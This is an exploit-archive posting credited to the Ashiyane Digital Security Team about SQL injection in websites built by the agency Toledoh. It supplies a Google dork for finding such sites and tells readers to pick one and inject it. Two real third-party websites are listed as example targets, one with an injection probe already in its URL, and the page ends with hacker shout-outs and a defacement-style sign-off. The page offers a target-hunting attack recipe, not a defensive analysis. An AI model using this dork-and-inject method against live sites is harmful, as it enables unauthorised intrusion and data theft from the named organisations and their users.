facebook facebook twitter rss

Website by Toledoh sql injection

Author: Ashiyane Digital Security Team , Published: 01-04-2013
|=================================================================================== 
| Exploit Title: Website by Toledoh sql injection
|===================================================================================
|Exploit Author: Ashiyane Digital Security Team
|===================================================================================
|D0rk: intext:"Website by Toledoh"
|===================================================================================
|Vendor Home: http://www.toledoh.com.au/
|===================================================================================
|Description : Search the dork in google then choose one of the sites an open it ,
|then go to a part of a site(everywhere you want). if link is like [.php?something-]
|try to convert - to = in adress bar .
|like first example ! and if it is common , try to inject it
|like second example.
|===================================================================================
|Example1:http://www.qcwa.org.au/how-you-can-help.php?Donations-1
| ==> http://www.qcwa.org.au/how-you-can-help.php?Donations=1
|-----------------------------------------------------------------------------------
|Example2:http://www.murraysbrewingco.com.au/brewery/brewery.php?num=2'
|===================================================================================
|Sp Tnx To:Milwar,Tr0jaman,Sil3nt,3amurai,Endless,Nilux,Alireza666
|,Cyb3r_Inj3ct0r,M43kh Sh0d3™,Mr.Hacker,Wanted,Amih03in,Soltan_m63
|ShahramBlackHat,R4DIC4L,Iramous,King98ir,R33VES™,T3rm!nat0r5,B4b4K KH4TaR
|And All Of My Friends
|===================================================================================
| InJEcTable Was Here ... HAMEDAN BAX !
|===================================================================================

Like us on Facebook :